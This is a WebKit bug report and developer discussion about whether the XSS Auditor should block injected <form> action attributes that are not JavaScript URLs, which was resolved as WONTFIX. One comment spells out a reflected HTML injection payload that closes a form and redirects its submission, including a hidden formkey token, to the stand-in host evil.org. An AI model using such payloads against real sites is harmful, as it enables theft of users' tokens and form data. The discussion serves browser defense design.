Summary: | XSS Auditor : <form> action is blocked even if it is not a JavaScript URL | ||
---|---|---|---|
Product: | WebKit | Reporter: | prakash.1729 |
Component: | WebCore Misc. | Assignee: | Nobody <webkit-unassigned> |
Status: | RESOLVED WONTFIX | ||
Severity: | Normal | CC: | abarth, ap, dbates, tsepez |
Priority: | P2 | Keywords: | XSSAuditor |
Version: | 528+ (Nightly build) | ||
Hardware: | Unspecified | ||
OS: | Linux |
Description
prakash.1729
2011-11-17 01:18:33 PST
Yeah, we should only need to block JavaScript URLs. (This is a false positive, so not a security bug.) Though it is a false positive according to the design, it is in-fact protecting against <form> injection which is good. It is the same with <iframe> injection where the src attribute is removed even if the src is not a JavaScript URL . One more corner case is that <iframe> from a same domain can be injected successfully. I assume this as a design decision . p.s I couldn't find an example in which detecting an injected form is a false positive Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains: <form action="http://good.com"> <input type="text" name="quantity" value="2"> <input type="hidden" name="formkey" value="91812727123812"> <input type="submit"> </form> and the "quantity" input element contains an injection, and we reflect from the URL say ...?quantity="></form><form action="http://evil.org"> resulting in page: <form action="http://good.com"> <input type="text" name="quantity" value=""></form><form action="http://evil.org"> <input type="hidden" name="formkey" value="91812727123812"> <input type="submit"> </form> So when the user hits submit, we steal his formkey token (or other information from input fields). Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute. Thanks heaps. |